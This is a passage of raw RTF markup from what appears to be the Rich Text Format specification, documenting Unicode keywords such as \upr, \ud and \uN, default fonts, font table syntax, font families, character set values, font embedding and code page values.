\par 1255}{\cs113\cf1\revised\revdttm1714774828 \tab }{\cs113\cf1\revised\revdttm1714774824 Hebrew
\par 1256}{\cs113\cf1\revised\revdttm1714774828 \tab }{\cs113\cf1\revised\revdttm1714774824 Arabic
\par 1257}{\cs113\cf1\revised\revdttm1714774827 \tab }{\cs113\cf1\revised\revdttm1714774824 Baltic
\par 1258}{\cs113\cf1\revised\revdttm1714774827 \tab }{\cs113\cf1\revised\revdttm1714774824 Vietnamese
\par 1361}{\cs113\cf1\revised\revdttm1714774829 \tab }{\cs113\cf1\revised\revdttm1714774824 Johab}{\cs113\cf1
\par }{This keyword should be emitted in the RTF header section right after the }{\b \\ansi}{, }{\b \\mac}{, }{\b \\pc}{ or }{\b \\pca}{ keyword.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright
\b\f1\fs20\cgrid {\\upr\cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {This keyword represents a destination with two embedded
destinations, one represented using Unicode and the other using ANSI. This keyword operates in conjunction with the }{\b \\ud }{keyword to provide backward compatibility. The general syntax is as follows:
\par }\pard\plain \s70\li432\sa120\widctlpar\intbl\adjustright \f2\fs16\cgrid {\{\\upr\{keyword ansi_text\}\{\\*\\ud\{keyword Unicode_text\}\}\}
\par }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {Notice that this keyword destination does not use the }{\b \\* }{keyword; this forces the old RTF readers to pick up the ANSI representation and discard the Unicode one.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {\\ud\cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {
This is a destination that is represented in Unicode. The text is represented using a mixture of ANSI translation and use of }{\b \\u}{\b\i N }{keywords to represent characters that do not have the exact ANSI equivalent.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {\\u}{\i N}{ \cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {
This keyword represents a single Unicode character that has no equivalent ANSI representation based on the current ANSI code page. }{\b\i N}{ represents the Unicode character value expressed as a decimal number.
\par This keyword is followed immediately by equivalent character(s) in ANSI representation. In this way, old readers will ignore the }{\b \\u}{\b\i N}{ keyword and pick up the ANSI representation properly. Wh
en this keyword is encountered, the reader should ignore the next }{\b\i N}{ characters, where }{\b\i N}{\b }{corresponds to the last }{\b \\uc}{\b\i N}{ value encountered.
\par As with all RTF keywords, a keyword-terminating space may be present (before the ANSI characters) that is not counted in the characters to skip. While this is not likely to occur (or recommended), a }{\b \\bin}{
keyword, its argument, and the binary data that follows are considered one character for skipping purposes. If an RTF scope delimiter character (that is, an opening or clos
ing brace) is encountered while scanning skippable data, the skippable data is considered to be ended before the delimiter. This makes it possible for a reader to perform some rudimentary error recovery. To include an RTF delimiter in skippable data, it m
ust be represented using the appropriate control symbol (that is, escaped with a backslash,) as in plain text. Any RTF control word or symbol is considered a single character for the purposes of counting skippable characters.
\par An RTF writer, when it encounters a Unicode character with no corresponding ANSI character, should output }{\b \\u}{\b\i N}{
followed by the best ANSI representation it can manage. Also, if the Unicode character translates into an ANSI character stream with count of bytes differing from the current Unicode Character Byte Count, it should emit the }{\b \\uc}{\b\i N}{
keyword prior to the }{\b \\u}{\b\i N}{\b }{keyword}{\b }{to notify the reader of the change.
\par RTF control words generally accept signed 16-bit numbers as arguments. For this reason, Unicode values greater than 32767 must be expressed as negative numbers.\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb
\cellx2112\clvertalt\cltxlrtb \cellx10032\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {\\uc}{\i N}{\cell }\pard\plain \s74\sa60\widctlpar\intbl\adjustright \f1\fs22\cgrid {\fs20
This keyword represents the number of bytes corresponding to a given }{\b\fs20 \\u}{\b\i\fs20 N }{\fs20 Unicode character. This keyword may be used at any time, and values are scoped like character properties. That is, a }{\b\fs20 \\uc}{\b\i\fs20 N }{
\fs20 keyword applies only to text following the keyword, and within the same (or deeper) nested braces. On exiting the group, the previous }{\b\fs20 \\uc}{\fs20
value is restored. The reader must keep a stack of counts seen and use the most recent one to skip the appropriate number of characters when it encounters a }{\b\fs20 \\u}{\b\i\fs20 N }{\fs20 keyword. When leaving an RTF group that specified a }{\b\fs20
\\uc}{\fs20 value, the reader must revert to the previous value. A default of 1 should be assumed if no }{\b\fs20 \\uc}{\fs20 keyword has been seen in the current or outer scopes.
\par }\pard \s74\sb120\sa60\widctlpar\intbl\adjustright {A }{\fs20 common practice is to emit no ANSI representation for Unicode characters within a Unicode destination context (that is, inside a }{\b\fs20 \\ud}{\fs20
destination). Typically, the destination will contain a }{\b\fs20 \\uc0}{\fs20 control sequence. There is no need to reset the count on leaving the }{\b\fs20 \\ud }{\fs20 destination, because the scoping rules will ensure the previous value is restored.
}{\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s4\sb240\sa240\keepn\widctlpar\outlinelevel3\adjustright \b\i\f1\cgrid {{\*\bkmkstart _Toc379295356}{\*\bkmkstart _Toc380819774}{\*\bkmkstart Document_Text}Document Text
{\*\bkmkend _Toc379295356}{\*\bkmkend _Toc380819774}{\*\bkmkend Document_Text}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {Document text should be emitted as ANSI characters. If there are Unicode characters that do not have corresponding ANSI characters, they should be output using the }{\b \\uc}{\b\i N}{ and }{\b \\u}
{\b\i N}{ keywords.
\par For example, the text }{\b Lab}{\field\fldedit\fldlock{\*\fldinst {\b symbol 71 \\f "Symbol" \\s 10}}{\fldrslt {\b\f3 \u-4025\'47}}}{\b Value}{
(Unicode characters 0x004c, 0x0061, 0x0062, 0x0393, 0x0056, 0x0061, 0x006c, 0x0075, 0x0065) should be represented as follows (assuming a previous }{\b \\ucl)}{:
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {Lab\\u915GValue
\par }\pard\plain \s4\sb240\sa240\keepn\widctlpar\outlinelevel3\adjustright \b\i\f1\cgrid {{\*\bkmkstart _Toc379295357}{\*\bkmkstart _Toc380819775}{\*\bkmkstart Destination_text}Destination Text{\*\bkmkend _Toc379295357}{\*\bkmkend _Toc380819775}
{\*\bkmkend Destination_text}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {Destination text is defined as any text represented in an RTF destination. A good example is the bookmark name in the }{\b \\bkmkstart}{ destination.
\par Any destination containing Unicode characters should be emitted as two destinations within a }{\b \\upr}{ destination to ensure that old readers can read it properly and that no Unicode character encoding is lost when read with a new reader.
\par For example, a bookmark name }{\b Lab}{\field\fldedit\fldlock{\*\fldinst {\b symbol 71 \\f "Symbol" \\s 10}}{\fldrslt {\b\f3 \u-4025\'47}}}{\b Value}{
(Unicode characters 0x004c, 0x0061, 0x0062, 0x0393, 0x0056, 0x0061, 0x006c, 0x0075, 0x0065) should be represented as follows:
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {\{\\upr\{\\*\\bkmkstart LabGValue\}\{\\*\\ud\{\\*\\bkmkstart Lab\\u915Value\}\}\}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The first subdestination contains only ANSI characters and is the representation that old readers will see. The second subdestination is a }{\b \\*\\ud }{
destination that contains a second copy of the }{\b \\bkmkstart}{ destination. This copy can contain Unicode characters and is the representation that Unicode-aware readers must pay attention to, ignoring the ANSI-only version.
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Default_Fonts}{\*\bkmkstart _Toc521909684}{\*\bkmkstart _Toc380819776}{\*\bkmkstart _Toc381591825}{\*\bkmkstart _Toc382644186}
{\*\bkmkstart _Toc383176017}{\*\bkmkstart _Toc386002175}{\*\bkmkstart _Toc386539806}{\*\bkmkstart Font_Table}{\*\bkmkstart _Toc519492441}{\*\bkmkend _Default_Fonts}Default Fonts{\*\bkmkend _Toc521909684}
\par }\pard\plain \s15\sa120\nowidctlpar\adjustright \f1\fs20\cgrid {Default font settings can be used to tell the program what regional settings are appropriate as defaults. For example, having a Japanese font set in }{\b \\stshfdbch}{\b\i N }{
would tell Word to enable Japanese formatting options. }{\b\i N}{ refers to an entry in the font table.
\par }\pard \s15\li288\sa120\nowidctlpar\adjustright {
\par }\trowd \trgaph108\trrh360\trleft-108 \clvertalt\cltxlrtb \cellx1608\clvertalt\cltxlrtb \cellx9543\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {\cell }{\b \\stshfdbch}{\b\i N}{\b \\stshfloch}{\b\i N}{\b \\stshfhich}{\b\i N}{\b \\
stshfbi\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trgaph108\trrh360\trleft-108 \clvertalt\cltxlrtb \cellx1608\clvertalt\cltxlrtb \cellx9543\pard\plain \s15\sa120\nowidctlpar\intbl\adjustright \f1\fs20\cgrid {\b \\
stshfdbch}{\b\i N}{\cell }\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {Defines what font should be used by default in the style sheet for Far East characters. }{\b\i \cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row
}\pard\plain \s15\sa120\nowidctlpar\intbl\adjustright \f1\fs20\cgrid {\b \\stshfloch}{\b\i N}{\b \cell }\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {Defines what font should be used by default in the style sheet for ACSII characters.\cell
}\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s15\sa120\nowidctlpar\intbl\adjustright \f1\fs20\cgrid {\b \\stshfhich}{\b\i N}{\b \cell }\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {
Defines what font should be used by default in the style sheet for High-ANSI characters. \cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trgaph108\trrh360\trleft-108 \clvertalt\cltxlrtb \cellx1608\clvertalt\cltxlrtb
\cellx9543\pard\plain \s15\sa120\nowidctlpar\intbl\adjustright \f1\fs20\cgrid {\b \\stshfbi\cell }\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {Defines what font should be used by default in the style sheet for Complex Scripts (BiDi) characters.
\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s15\li288\sa120\nowidctlpar\adjustright \f1\fs20\cgrid {
\par Default font settings can be used to tell the program what regional settings are appropriate as defaults. For example, having a Japanese font set in }{\b \\stshfdbch}{\b\i N }{would tell Word to enable Japanese formatting options. }{\b\i N}{ refers to
an entry in the font table.
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Toc521909685}Font Table{\*\bkmkend _Ref281718258}{\*\bkmkend _Ref281718288}{\*\bkmkend _Ref281718720}{\*\bkmkend _Toc313960802}
{\*\bkmkend _Toc335399076}{\*\bkmkend _Toc380819776}{\*\bkmkend _Toc381591825}{\*\bkmkend _Toc382644186}{\*\bkmkend _Toc383176017}{\*\bkmkend _Toc386002175}{\*\bkmkend _Toc386539806}{\*\bkmkend Font_Table}{\*\bkmkend _Toc519492441}
{\*\bkmkend _Toc521909685}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The }{\b \\fonttbl}{ control word introduces the font table group. Unique }{\b \\f}{\b\i N}{
control words define each font available in the document, and are used to reference that font throughout the document. The font table group has the following syntax.
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\cell }{\lang1036 '\{' }{\b\lang1036 \\fonttbl }{\lang1036 ( | ('\{' '\}'))+ '\}'\cell }\pard
\widctlpar\intbl\adjustright {\lang1036 \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\cell
? ? ? ? ? ? ? }{\lang3082 ';' \cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard \sa120\widctlpar\intbl\adjustright {\lang3082
\cell }{\b\i\lang3082 \\f}{\lang3082 \cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard \sa120\widctlpar\intbl\adjustright {\lang3082 \cell }{\b\lang3082 \\fnil}{\lang3082 | }{\b\lang3082 \\froman}{\lang3082 | }{\b\lang3082 \\
fswiss}{\lang3082 | }{\b\lang3082 \\fmodern}{\lang3082 | }{\b\lang3082 \\fscript}{\lang3082 | }{\b\lang3082 \\fdecor}{\lang3082 | }{\b\lang3082 \\ftech}{\lang3082 | }{\b\lang3082 \\fbidi}{\lang3082 \cell }\pard \widctlpar\intbl\adjustright {
\lang3082 \row }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b \\}{\b\i fcharset}{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b \\}{\b\i fprq}{\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b \cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell \\*\\}{\b fname}{\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell #PCDATA\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\lang1053 '\{}{\b\lang1053 \\*}{\lang1053
'}{\b\lang1053 \\falt }{\lang1053 #PCDATA '\}'}{\b\i\lang1053 \cell }\pard \widctlpar\intbl\adjustright {\lang1053 \row }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\lang1036 '\{\\*' }{\b\lang1036 \\fontemb}{\lang1036
? }{? '\}'\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b \\ftnil}{ | }{\b \\fttruetype}{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\widctlpar\intbl\adjustright {\cell }{\lang1036 '\{\\*' }{\b\lang1036 \\fontfile}{\lang1036 ? #PCDATA '\}'\cell }\pard \widctlpar\intbl\adjustright {\lang1036 \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160
\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\cell }\pard\plain \s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {\\}{\b\i cpg}{\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard
\sa120\widctlpar\adjustright {
\par Note for that either or must be present, although both may be present.
\par All fonts available to the RTF writer can be included in the font table, even if the document doesn't use all the fonts.
\par RTF also supports font families so that applications can attempt to intelligently choose fonts if the exact font is not present on the reading system. RTF uses the following control words to describe the various font families.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx6498\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx9738\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b Control word
\cell Font family\cell Examples\cell }\pard \widctlpar\intbl\adjustright {\b \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx6498\clvertalt\cltxlrtb \cellx9738\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\fnil
\cell }{Unknown or default fonts (the default)\cell Not applicable\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b \\froman\cell }{Roman, proportionally spaced serif fonts\cell Times New Roman, Palatino
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b \\fswiss\cell }{Swiss, proportionally spaced sans serif fonts\cell Arial\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\ri-720\sa120\widctlpar\intbl\adjustright {\b \\fmodern\cell }{Fixed-pitch serif and sans serif fonts\cell Courier New, Pica\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b \\fscript\cell }{Script fonts
\cell Cursive\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b \\fdecor\cell }{Decorative fonts\cell Old English, ITC Zapf Chancery\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\ri-720\sa120\widctlpar\intbl\adjustright {\b \\ftech\cell }{Technical, symbol, and mathematical fonts\cell Symbol\cell }\pard \widctlpar\intbl\adjustright {\f5 \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx6498
\clvertalt\cltxlrtb \cellx9738\pard \ri-720\sa240\widctlpar\intbl\adjustright {\b \\fbidi\cell }{Arabic, Hebrew, or other bidirectional font\cell Miriam\cell }\pard \widctlpar\intbl\adjustright {\f5 \row }\pard \sa120\widctlpar\adjustright {
\par If an RTF file uses a default font, the default font number is specified with the }{\b \\deff}{\b\i N}{ control word, which must precede the font-table group. The RTF writer supplies the default font number used in the creati
on of the document as the numeric argument }{\b\i N}{. The RTF reader then translates this number through the font table into the most similar font available on the reader's system.
\par The following control words specify the character set, alternative font name, pitch of a font in the font table, and nontagged font name.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Meaning\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\fcharset}{\b\i N }{\b \cell }\pard \sa120\nowidctlpar\intbl\adjustright {
Specifies the character set of a font in the font table. Values for }{\b\i N}{ are defined by Windows header files:
\par }{\cs113\cf1 0\tab ANSI
\par 1\tab Default
\par 2\tab Symbol
\par 3\tab Invalid
\par 77\tab Mac
\par 128\tab Shift Jis
\par 129\tab Hangul
\par 130\tab Johab
\par 134\tab GB2312
\par 136\tab Big5
\par 161\tab Greek
\par 162\tab Turkish
\par 163\tab Vietnamese
\par 177\tab Hebrew
\par 178\tab Arabic
\par 179\tab Arabic Traditional
\par 180\tab Arabic user
\par 181\tab Hebrew user
\par 186\tab Baltic
\par 204\tab Russian
\par 222\tab Thai
\par 238\tab Eastern European
\par 254\tab PC 437
\par 255\tab OEM}{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\falt\cell }{Indicates alternate font name to use if the specified font in the font table is not available. '}{\b \{\\*' \\falt}{
'}{\b \}}{' \cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fprq}{\b\i N }{\b \cell }{Specifies the pitch of a font in the font table.\cell }\pard \widctlpar\intbl\adjustright {\row
}\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10032\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {\\*\\panose\cell }\pard\plain \s21\sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {
Destination keyword. This destination contains a 10-byte Panose 1 number. Each byte represents a single font property as described by the Panose 1 standard specification.\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd
\trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b \\*\\fname\cell }{
This is an optional control word in the font table to define the nontagged font name. This is the actual name of the font without the tag, used to show wh
ich character set is being used. For example, Arial is a nontagged font name, and Arial (Cyrillic) is a tagged font name. This control word is used by WordPad. Word ignores this control word (and never creates it).\cell }\pard
\widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10032\pard \sa120\widctlpar\intbl\adjustright {\b\cf1 \\fbias}{\b\i\cf1 N}{\cell }\pard \sa120\widctlpar\intbl\tx480\adjustright {\cf1
Used to arbitrate between two fonts when a particular character can exist in either non-Far East or Far East font. Word 97 through Word 2002 emit the }{\b\cf1 \\fbiasN }{\cf1 keyword only in the context of bullets or list information (that is, a }{\b\cf1
\\listlevel }{\cf1 destination). The default value of 0 for }{\b\cf1 N}{\cf1 indicates a non-Far East font. A value of 1 indicates a Far East font. Additional values may be defined in future releases.\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\widctlpar\adjustright {
\par If }{\b \\fprq}{ is specified, the }{\b\i N}{ argument can be one of the following values.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\keepn\widctlpar\intbl\adjustright {\b Pitch\cell Value\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\keepn\widctlpar\intbl\adjustright {Default pitch\cell 0\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\widctlpar\intbl\adjustright {Fixed pitch\cell 1\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {Variable pitch\cell 2
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard\plain \s4\sb240\sa240\keepn\widctlpar\outlinelevel3\adjustright \b\i\f1\cgrid {{\*\bkmkstart _Toc313960803}{\*\bkmkstart _Toc335399077}{\*\bkmkstart _Toc380819777}{\*\bkmkstart Font_Embedding}
{\*\bkmkstart _Ref281718077}Font Embedding{\*\bkmkend _Toc313960803}{\*\bkmkend _Toc335399077}{\*\bkmkend _Toc380819777}{\*\bkmkend Font_Embedding}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {RTF supports embedded fonts with the }{\b \\fontemb}{
group located inside a font definition. An embedded font can be specified by a file name, or the actual font data may be located inside the group. If a file name is specified, it is contained in the }{\b \\fontfile}{ group. The }{\b \\cpg}{
control word can be used to specify the character set for the file name.
\par RTF supports TrueType}{\field\fldedit\fldlock{\*\fldinst {\fs12 symbol 210 \\f "Symbol" \\s 6}}{\fldrslt {\f3\fs12 \u210\'d2}}}{ and other embedded fonts. The type of the embedded font is described by the following control words.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Embedded font type\cell }\pard
\widctlpar\intbl\adjustright {\b \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\ftnil\cell }{Unknown or default font type (the default)\cell }\pard
\widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b \\fttruetype\cell }{TrueType font\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard\plain \s4\sb240\sa240\keepn\widctlpar\outlinelevel3\adjustright \b\i\f1\cgrid {{\*\bkmkstart _Ref284384822}{\*\bkmkstart _Toc313960804}{\*\bkmkstart _Toc335399078}{\*\bkmkstart _Toc380819778}{\*\bkmkstart CodePage_Support}Code Page Support
{\*\bkmkend _Ref281718077}{\*\bkmkend _Ref284384822}{\*\bkmkend _Toc313960804}{\*\bkmkend _Toc335399078}{\*\bkmkend _Toc380819778}{\*\bkmkend CodePage_Support}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {A font may have a different character set from the character set of the document. For example, the Symbol font has the same
characters in the same positions both on the Macintosh and in Windows. RTF describes this with the }{\b \\cpg}{
control word, which names the character set used by the font. In addition, file names (used in field instructions and in embedded fonts) may not necessarily be the same as the character set of the document; the }{\b \\cpg}{
control word can change the character set for these file names as well. However, all RTF documents must still declare a character set (that is, }{\b \\ansi}{,}{\b \\mac}{,}{\b \\pc}{, or }{\b \\pca}{) to maintain backward
compatibility with earlier RTF readers.
\par }\pard \sa120\keepn\widctlpar\adjustright {The following table describes valid values for }{\b \\cpg}{.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\nowidctlpar\intbl\adjustright {\b Value\cell Description\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\nowidctlpar\intbl\adjustright {437\cell United States IBM\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {
\lang3082 708\cell Arabic (ASMO 708)\cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard \sa120\nowidctlpar\intbl\adjustright {\lang3082 709\cell Arabic (ASMO 449+, BCON V4)\cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard
\sa120\nowidctlpar\intbl\adjustright {710\cell Arabic (transparent Arabic)\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {711\cell Arabic (Nafitha Enhanced)\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\nowidctlpar\intbl\adjustright {720\cell Arabic (transparent ASMO)\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {819\cell Windows 3.1 (United States and Western Europe)\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {850\cell IBM multilingual\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {852\cell Eastern European\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {860\cell Portuguese\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {862\cell Hebrew\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\nowidctlpar\intbl\adjustright {863\cell French Canadian\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {864\cell Arabic\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\nowidctlpar\intbl\adjustright {865\cell Norwegian\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {866\cell Soviet Union\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\nowidctlpar\intbl\adjustright {874\cell Thai\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {932\cell Japanese\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {
936\cell Simplified Chinese\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {949\cell Korean\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {950\cell
Traditional Chinese\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1250\cell Windows 3.1 (Eastern European)\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1251\cell
Windows 3.1 (Cyrillic)\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1252\cell Western European\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1253\cell Greek\cell
}\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1254\cell Turkish\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1255\cell Hebrew\cell }\pard \widctlpar\intbl\adjustright
{\row }\pard \sa120\nowidctlpar\intbl\adjustright {1256\cell Arabic\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1257\cell Baltic\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\nowidctlpar\intbl\adjustright {1258\cell Vietnamese\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\nowidctlpar\intbl\adjustright {1361\cell Johab
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {\lang1036 {\*\bkmkstart _Ref281718621}{\*\bkmkstart _Toc313960805}{\*\bkmkstart _Toc335399079}
